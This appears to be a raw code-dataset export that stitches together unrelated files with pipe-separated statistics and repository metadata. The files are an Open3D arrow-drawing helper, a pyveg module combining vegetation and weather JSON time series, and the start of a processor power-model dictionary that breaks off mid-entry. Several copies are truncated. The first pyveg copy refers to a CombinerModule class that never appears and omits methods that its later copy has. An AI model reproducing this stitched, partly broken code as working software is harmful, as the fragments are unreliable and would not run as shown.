# Rotation over y axis of the FOR
beta = np.arctan(vec[0] / (vec[2] + 1e-8))
Ry = np.array(
[[np.cos(beta), 0, np.sin(beta)], [0, 1, 0], [-np.sin(beta), 0, np.cos(beta)]]
)
return (Rz, Ry)
def get_arrow(scale=10):
"""
Create an arrow in for Open3D
"""
cone_height = scale * 0.2
cylinder_height = scale * 0.8
cone_radius = scale / 10
cylinder_radius = scale / 20
mesh_frame = o3d.geometry.TriangleMesh.create_arrow(
cone_radius=0.5,
cone_height=cone_height,
cylinder_radius=0.25,
cylinder_height=cylinder_height,
)
return mesh_frame
def create_arrow(origin=[0, 0, 0], end=None, color=[1, 0, 0], vec=None):
"""
Creates an arrow from an origin point to an end point,
or create an arrow from a vector vec starting from origin.
Args:
- end (): End point. [x,y,z]
- vec (): Vector. [i,j,k]
"""
scale = 10
Ry = Rz = np.eye(3)
T = np.array([[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]])
T[:3, -1] = origin
if end is not None:
vec = np.array(end) - np.array(origin)
elif vec is not None:
vec = np.array(vec)
if end is not None or vec is not None:
scale = vector_magnitude(vec)
Rz, Ry = calculate_zy_rotation_for_arrow(vec)
mesh = get_arrow(scale)
# Create the arrow
mesh.rotate(Ry, center=np.array([0, 0, 0]))
mesh.rotate(Rz, center=np.array([0, 0, 0]))
mesh.translate(origin)
mesh.paint_uniform_color(color)
return mesh
# # Create a Cartesian Frame of Reference
# FOR = get_o3d_FOR()
# # Create an arrow from point (5,5,5) to point (10,10,10)
# arrow = get_arrow([5,5,5],[10,10,10])
# # Create an arrow representing vector vec, starting at (5,5,5)
# # arrow = get_arrow([5,5,5],vec=[5,5,5])
# # Create an arrow in the same place as the z axis
# # arrow = get_arrow()
# # Draw everything
# draw_geometries([FOR,arrow])
| 27.428571 | 86 | 0.596644 | import open3d as o3d
import numpy as np
# def draw_geometries(pcds):
# """
# Draw Geometries
# Args:
# - pcds (): [pcd1,pcd2,...]
# """
# o3d.visualization.draw_geometries(pcds)
# def get_o3d_FOR(origin=[0, 0, 0], size=10):
# """
# Create a FOR that can be added to the open3d point cloud
# """
# mesh_frame = o3d.geometry.TriangleMesh.create_coordinate_frame(size=size)
# mesh_frame.translate(origin)
# return mesh_frame
def vector_magnitude(vec):
"""
Calculates a vector's magnitude.
Args:
- vec ():
"""
magnitude = np.sqrt(np.sum(vec ** 2))
return magnitude
def calculate_zy_rotation_for_arrow(vec):
"""
Calculates the rotations required to go from the vector vec to the
z axis vector of the original FOR. The first rotation that is
calculated is over the z axis. This will leave the vector vec on the
XZ plane. Then, the rotation over the y axis.
Returns the angles of rotation over axis z and y required to
get the vector vec into the same orientation as axis z
of the original FOR
Args:
- vec ():
"""
# Rotation over z axis of the FOR
gamma = np.arctan(vec[1] / vec[0])
Rz = np.array(
[
[np.cos(gamma), -np.sin(gamma), 0],
[np.sin(gamma), np.cos(gamma), 0],
[0, 0, 1],
]
)
# Rotate vec to calculate next rotation
vec = Rz.T @ vec.reshape(-1, 1)
vec = vec.reshape(-1)
# Rotation over y axis of the FOR
beta = np.arctan(vec[0] / (vec[2] + 1e-8))
Ry = np.array(
[[np.cos(beta), 0, np.sin(beta)], [0, 1, 0], [-np.sin(beta), 0, np.cos(beta)]]
)
return (Rz, Ry)
def get_arrow(scale=10):
"""
Create an arrow in for Open3D
"""
cone_height = scale * 0.2
cylinder_height = scale * 0.8
cone_radius = scale / 10
cylinder_radius = scale / 20
mesh_frame = o3d.geometry.TriangleMesh.create_arrow(
cone_radius=0.5,
cone_height=cone_height,
cylinder_radius=0.25,
cylinder_height=cylinder_height,
)
return mesh_frame
def create_arrow(origin=[0, 0, 0], end=None, color=[1, 0, 0], vec=None):
"""
Creates an arrow from an origin point to an end point,
or create an arrow from a vector vec starting from origin.
Args:
- end (): End point. [x,y,z]
- vec (): Vector. [i,j,k]
"""
scale = 10
Ry = Rz = np.eye(3)
T = np.array([[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]])
T[:3, -1] = origin
if end is not None:
vec = np.array(end) - np.array(origin)
elif vec is not None:
vec = np.array(vec)
if end is not None or vec is not None:
scale = vector_magnitude(vec)
Rz, Ry = calculate_zy_rotation_for_arrow(vec)
mesh = get_arrow(scale)
# Create the arrow
mesh.rotate(Ry, center=np.array([0, 0, 0]))
mesh.rotate(Rz, center=np.array([0, 0, 0]))
mesh.translate(origin)
mesh.paint_uniform_color(color)
return mesh
# # Create a Cartesian Frame of Reference
# FOR = get_o3d_FOR()
# # Create an arrow from point (5,5,5) to point (10,10,10)
# arrow = get_arrow([5,5,5],[10,10,10])
# # Create an arrow representing vector vec, starting at (5,5,5)
# # arrow = get_arrow([5,5,5],vec=[5,5,5])
# # Create an arrow in the same place as the z axis
# # arrow = get_arrow()
# # Draw everything
# draw_geometries([FOR,arrow])
| 0 | 0 | 0 |
e7710191460ec558981dba0a6dd8d7d2c1cf33b3 | 12,043 | py | Python | pyveg/src/combiner_modules.py | usethedata/monitoring-ecosystem-resilience | 950d2c7b1d8cf6d5e022b490ebcd1753b90242e2 | [
"MIT"
] | 19 | 2019-10-03T11:07:55.000Z | 2022-03-03T09:16:00.000Z | pyveg/src/combiner_modules.py | usethedata/monitoring-ecosystem-resilience | 950d2c7b1d8cf6d5e022b490ebcd1753b90242e2 | [
"MIT"
] | 315 | 2019-10-04T15:32:22.000Z | 2020-11-09T16:37:30.000Z | pyveg/src/combiner_modules.py | usethedata/monitoring-ecosystem-resilience | 950d2c7b1d8cf6d5e022b490ebcd1753b90242e2 | [
"MIT"
] | 3 | 2020-06-30T14:06:19.000Z | 2022-03-27T06:22:18.000Z | """
Modules that can consolidate inputs from different sources
and produce combined output file (typically JSON).
"""
import os
import json
from pyveg.src.file_utils import save_json, get_tag
from pyveg.src.date_utils import get_date_strings_for_time_period
from pyveg.src.pyveg_pipeline import BaseModule, logger
class VegAndWeatherJsonCombiner(CombinerModule):
"""
Expect directory structures like:
<something>/<input_veg_location>/<date>/network_centralities.json
<something>/<input_weather_location>/RESULTS/weather_data.json
"""
def set_default_parameters(self):
"""
See if we can set our input directories from the output directories
of previous Sequences in the pipeline.
The pipeline (if there is one) will be a grandparent,
i.e. self.parent.parent
and the names of the Sequences we will want to combine should be
in the variable self.depends_on.
"""
super().set_default_parameters()
# get the parent Sequence and Pipeline
if self.parent and self.parent.parent:
# we're running in a Pipeline
for seq_name in self.parent.depends_on:
seq = self.parent.parent.get(seq_name)
if seq.data_type == "vegetation":
self.input_veg_sequence = seq_name
elif seq.data_type == "weather":
self.input_weather_sequence = seq_name
if not (
"input_veg_sequence" in vars(self)
and "input_weather_sequence" in vars(self)
):
raise RuntimeError(
"{}: Unable to find vegetation and weather sequences in depends_on".format(
self.name, self.depends_on
)
)
# now get other details from the input sequences
veg_sequence = self.parent.parent.get(self.input_veg_sequence)
self.input_veg_location = veg_sequence.output_location
self.input_veg_location_type = veg_sequence.output_location_type
self.veg_collection = veg_sequence.collection_name
weather_sequence = self.parent.parent.get(self.input_weather_sequence)
self.input_weather_location = weather_sequence.output_location
self.input_weather_location_type = weather_sequence.output_location_type
self.weather_collection = weather_sequence.collection_name
else:
# No parent Sequence or Pipeline - perhaps running standalone
self.weather_collection = "ECMWF/ERA5/MONTHLY"
self.veg_collection = "COPERNICUS/S2"
self.input_veg_location_type = "local"
self.input_weather_location_type = "local"
self.output_location_type = "local"
if not "output_filename" in vars(self):
self.output_filename = "results_summary.json"
def combine_json_lists(self, json_lists):
"""
If for example we have json files from the NetworkCentrality
and NDVI calculators, all containing lists of dicts for sub-images,
combine them here by matching by coordinate.
"""
if len(json_lists) == 0:
return None
elif len(json_lists) == 1:
return json_lists[0]
## any way to do this without a huge nested loop?
# loop over all the lists apart from the first, which we will add to
for jlist in json_lists[1:]:
# loop through all items (sub-images) in each list
for p in jlist:
match_found = False
# loop through all items (sub-images) in the first/output list
for p0 in json_lists[0]:
# match by latitude, longitude.
if (p["latitude"], p["longitude"], p["date"]) == (
p0["latitude"],
p0["longitude"],
p0["date"],
):
match_found = True
for k, v in p.items():
if not k in p0.keys():
p0[k] = v
break
if not match_found:
json_lists[0].append(p)
return json_lists[0]
def get_veg_time_series(self):
"""
Combine contents of JSON files written by the NetworkCentrality
and NDVI calculator Modules.
If we are running in a Pipeline, get the expected set of date strings
from the vegetation sequence we depend on, and if there is no data
for a particular date, make a null entry in the output.
"""
dates_with_data = self.list_directory(
self.input_veg_location, self.input_veg_location_type
)
if self.parent and self.parent.parent and "input_veg_sequence" in vars(self):
veg_sequence = self.parent.parent.get(self.input_veg_sequence)
start_date, end_date = veg_sequence.date_range
time_per_point = veg_sequence.time_per_point
date_strings = get_date_strings_for_time_period(
start_date, end_date, time_per_point
)
else:
date_strings = dates_with_data
date_strings.sort()
veg_time_series = {}
for date_string in date_strings:
if not date_string in dates_with_data:
veg_time_series[date_string] = None
# if there is no JSON directory for this date, add a null entry
if "JSON" not in self.list_directory(
self.join_path(self.input_veg_location, date_string),
self.input_veg_location_type,
):
veg_time_series[date_string] = None
continue
# find the subdirs of the JSON directory
subdirs = self.list_directory(
self.join_path(self.input_veg_location, date_string, "JSON"),
self.input_veg_location_type,
)
veg_lists = []
for subdir in subdirs:
logger.debug(
"{}: getting vegetation time series for {}".format(
self.name,
self.join_path(
self.input_veg_location, date_string, "JSON", subdir
),
)
)
# list the JSON subdirectories and find any .json files in them
dir_contents = self.list_directory(
self.join_path(self.input_veg_location, date_string, "JSON", subdir),
self.input_veg_location_type,
)
json_files = [
filename for filename in dir_contents if filename.endswith(".json")
]
for filename in json_files:
j = self.get_json(
self.join_path(
self.input_veg_location,
date_string,
"JSON",
subdir,
filename,
),
self.input_veg_location_type,
)
veg_lists.append(j)
# combine the lists from the different subdirectories
veg_time_point = self.combine_json_lists(veg_lists)
# update the final veg_time_series dictionary
veg_time_series[date_string] = veg_time_point
return veg_time_series
def check_output_dict(self, output_dict):
"""
For all the keys (i.e. dates) in the vegetation time-series,
count how many have data for both veg and weather
"""
veg_dates = output_dict[self.veg_collection]["time-series-data"].keys()
weather_dates = output_dict[self.weather_collection]["time-series-data"].keys()
for date in veg_dates:
if output_dict[self.veg_collection]["time-series-data"][date] \
and date in weather_dates \
and output_dict[self.weather_collection]["time-series-data"][date]:
self.run_status["succeeded"] += 1
return
def get_metadata(self):
"""
Fill a dictionary with info about this job - coords, date range etc.
"""
metadata = {}
if self.parent and self.parent.parent and "input_veg_sequence" in vars(self):
veg_sequence = self.parent.parent.get(self.input_veg_sequence)
metadata["start_date"], metadata["end_date"] = veg_sequence.date_range
metadata["time_per_point"] = veg_sequence.time_per_point
metadata["longitude"] = veg_sequence.coords[0]
metadata["latitude"] = veg_sequence.coords[1]
metadata["collection"] = veg_sequence.collection_name
metadata["num_data_points"] = self.run_status["succeeded"]
if "config_filename" in vars(self.parent.parent):
metadata["config_filename"] = self.parent.parent.config_filename
if "coords_id" in vars(self.parent.parent):
metadata["coords_id"] = self.parent.parent.coords_id
if "pattern_type" in vars(self.parent.parent):
metadata["pattern_type"] = self.parent.parent.pattern_type
metadata["tag"] = get_tag()
return metadata
| 41.815972 | 95 | 0.578593 | """
Modules that can consolidate inputs from different sources
and produce combined output file (typically JSON).
"""
import os
import json
from pyveg.src.file_utils import save_json, get_tag
from pyveg.src.date_utils import get_date_strings_for_time_period
from pyveg.src.pyveg_pipeline import BaseModule, logger
class CombinerModule(BaseModule):
def __init__(self, name=None):
super().__init__(name)
self.params += [("output_location", [str]), ("output_location_type", [str])]
class VegAndWeatherJsonCombiner(CombinerModule):
"""
Expect directory structures like:
<something>/<input_veg_location>/<date>/network_centralities.json
<something>/<input_weather_location>/RESULTS/weather_data.json
"""
def __init__(self, name=None):
super().__init__(name)
self.params += [
("input_veg_location", [str]),
("input_weather_location", [str]),
("input_veg_location_type", [str]),
("input_weather_location_type", [str]),
("weather_collection", [str]),
("veg_collection", [str]),
("output_filename", [str]),
]
def set_default_parameters(self):
"""
See if we can set our input directories from the output directories
of previous Sequences in the pipeline.
The pipeline (if there is one) will be a grandparent,
i.e. self.parent.parent
and the names of the Sequences we will want to combine should be
in the variable self.depends_on.
"""
super().set_default_parameters()
# get the parent Sequence and Pipeline
if self.parent and self.parent.parent:
# we're running in a Pipeline
for seq_name in self.parent.depends_on:
seq = self.parent.parent.get(seq_name)
if seq.data_type == "vegetation":
self.input_veg_sequence = seq_name
elif seq.data_type == "weather":
self.input_weather_sequence = seq_name
if not (
"input_veg_sequence" in vars(self)
and "input_weather_sequence" in vars(self)
):
raise RuntimeError(
"{}: Unable to find vegetation and weather sequences in depends_on".format(
self.name, self.depends_on
)
)
# now get other details from the input sequences
veg_sequence = self.parent.parent.get(self.input_veg_sequence)
self.input_veg_location = veg_sequence.output_location
self.input_veg_location_type = veg_sequence.output_location_type
self.veg_collection = veg_sequence.collection_name
weather_sequence = self.parent.parent.get(self.input_weather_sequence)
self.input_weather_location = weather_sequence.output_location
self.input_weather_location_type = weather_sequence.output_location_type
self.weather_collection = weather_sequence.collection_name
else:
# No parent Sequence or Pipeline - perhaps running standalone
self.weather_collection = "ECMWF/ERA5/MONTHLY"
self.veg_collection = "COPERNICUS/S2"
self.input_veg_location_type = "local"
self.input_weather_location_type = "local"
self.output_location_type = "local"
if not "output_filename" in vars(self):
self.output_filename = "results_summary.json"
def combine_json_lists(self, json_lists):
"""
If for example we have json files from the NetworkCentrality
and NDVI calculators, all containing lists of dicts for sub-images,
combine them here by matching by coordinate.
"""
if len(json_lists) == 0:
return None
elif len(json_lists) == 1:
return json_lists[0]
## any way to do this without a huge nested loop?
# loop over all the lists apart from the first, which we will add to
for jlist in json_lists[1:]:
# loop through all items (sub-images) in each list
for p in jlist:
match_found = False
# loop through all items (sub-images) in the first/output list
for p0 in json_lists[0]:
# match by latitude, longitude.
if (p["latitude"], p["longitude"], p["date"]) == (
p0["latitude"],
p0["longitude"],
p0["date"],
):
match_found = True
for k, v in p.items():
if not k in p0.keys():
p0[k] = v
break
if not match_found:
json_lists[0].append(p)
return json_lists[0]
def get_veg_time_series(self):
"""
Combine contents of JSON files written by the NetworkCentrality
and NDVI calculator Modules.
If we are running in a Pipeline, get the expected set of date strings
from the vegetation sequence we depend on, and if there is no data
for a particular date, make a null entry in the output.
"""
dates_with_data = self.list_directory(
self.input_veg_location, self.input_veg_location_type
)
if self.parent and self.parent.parent and "input_veg_sequence" in vars(self):
veg_sequence = self.parent.parent.get(self.input_veg_sequence)
start_date, end_date = veg_sequence.date_range
time_per_point = veg_sequence.time_per_point
date_strings = get_date_strings_for_time_period(
start_date, end_date, time_per_point
)
else:
date_strings = dates_with_data
date_strings.sort()
veg_time_series = {}
for date_string in date_strings:
if not date_string in dates_with_data:
veg_time_series[date_string] = None
# if there is no JSON directory for this date, add a null entry
if "JSON" not in self.list_directory(
self.join_path(self.input_veg_location, date_string),
self.input_veg_location_type,
):
veg_time_series[date_string] = None
continue
# find the subdirs of the JSON directory
subdirs = self.list_directory(
self.join_path(self.input_veg_location, date_string, "JSON"),
self.input_veg_location_type,
)
veg_lists = []
for subdir in subdirs:
logger.debug(
"{}: getting vegetation time series for {}".format(
self.name,
self.join_path(
self.input_veg_location, date_string, "JSON", subdir
),
)
)
# list the JSON subdirectories and find any .json files in them
dir_contents = self.list_directory(
self.join_path(self.input_veg_location, date_string, "JSON", subdir),
self.input_veg_location_type,
)
json_files = [
filename for filename in dir_contents if filename.endswith(".json")
]
for filename in json_files:
j = self.get_json(
self.join_path(
self.input_veg_location,
date_string,
"JSON",
subdir,
filename,
),
self.input_veg_location_type,
)
veg_lists.append(j)
# combine the lists from the different subdirectories
veg_time_point = self.combine_json_lists(veg_lists)
# update the final veg_time_series dictionary
veg_time_series[date_string] = veg_time_point
return veg_time_series
def get_weather_time_series(self):
date_strings = self.list_directory(
self.input_weather_location, self.input_weather_location_type
)
date_strings.sort()
weather_time_series = {}
for date_string in date_strings:
weather_json = self.get_json(
self.join_path(
self.input_weather_location,
date_string,
"JSON",
"WEATHER",
"weather_data.json",
),
self.input_weather_location_type,
)
weather_time_series[date_string] = weather_json
return weather_time_series
def check_output_dict(self, output_dict):
"""
For all the keys (i.e. dates) in the vegetation time-series,
count how many have data for both veg and weather
"""
veg_dates = output_dict[self.veg_collection]["time-series-data"].keys()
weather_dates = output_dict[self.weather_collection]["time-series-data"].keys()
for date in veg_dates:
if output_dict[self.veg_collection]["time-series-data"][date] \
and date in weather_dates \
and output_dict[self.weather_collection]["time-series-data"][date]:
self.run_status["succeeded"] += 1
return
def get_metadata(self):
"""
Fill a dictionary with info about this job - coords, date range etc.
"""
metadata = {}
if self.parent and self.parent.parent and "input_veg_sequence" in vars(self):
veg_sequence = self.parent.parent.get(self.input_veg_sequence)
metadata["start_date"], metadata["end_date"] = veg_sequence.date_range
metadata["time_per_point"] = veg_sequence.time_per_point
metadata["longitude"] = veg_sequence.coords[0]
metadata["latitude"] = veg_sequence.coords[1]
metadata["collection"] = veg_sequence.collection_name
metadata["num_data_points"] = self.run_status["succeeded"]
if "config_filename" in vars(self.parent.parent):
metadata["config_filename"] = self.parent.parent.config_filename
if "coords_id" in vars(self.parent.parent):
metadata["coords_id"] = self.parent.parent.coords_id
if "pattern_type" in vars(self.parent.parent):
metadata["pattern_type"] = self.parent.parent.pattern_type
metadata["tag"] = get_tag()
return metadata
def run(self):
self.check_config()
output_dict = {}
logger.info("{}: getting weather time series".format(self.name))
weather_time_series = self.get_weather_time_series()
output_dict[self.weather_collection] = {
"type": "weather",
"time-series-data": weather_time_series,
}
logger.info("{}: getting vegetation time series".format(self.name))
veg_time_series = self.get_veg_time_series()
output_dict[self.veg_collection] = {
"type": "vegetation",
"time-series-data": veg_time_series,
}
logger.info("{}: checking combined JSON".format(self.name))
self.check_output_dict(output_dict)
logger.info("{}: filling metadata dict".format(self.name))
metadata_dict = self.get_metadata()
output_dict["metadata"] = metadata_dict
self.save_json(
output_dict,
self.output_filename,
self.output_location,
self.output_location_type,
)
logger.info("{}: Wrote output to {}".format(
self.name,
self.join_path(self.output_location, self.output_filename)
)
)
self.is_finished = True
| 2,417 | 12 | 130 |
f47b46e0a3e2e6deb29327d0364675f56eb260ad | 68,621 | py | Python | benchmarks/SimResults/combinations_spec_pinned/cmp_bwavesgcccactusADMgromacs/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | benchmarks/SimResults/combinations_spec_pinned/cmp_bwavesgcccactusADMgromacs/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | benchmarks/SimResults/combinations_spec_pinned/cmp_bwavesgcccactusADMgromacs/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 5.66814e-06,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202693,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 2.02403e-05,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.369616,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.64004,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.367081,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.37674,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.365347,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.59398,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 3.82383e-06,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0133989,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0968933,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0990927,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0968971,
'Execution Unit/Register Files/Runtime Dynamic': 0.112492,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.234135,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.601487,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 2.69879,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00417854,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00417854,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00365895,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00142708,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00142347,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.0134395,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0393685,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0952604,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.05938,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.360214,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.323547,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.57647,
'Instruction Fetch Unit/Runtime Dynamic': 0.831829,
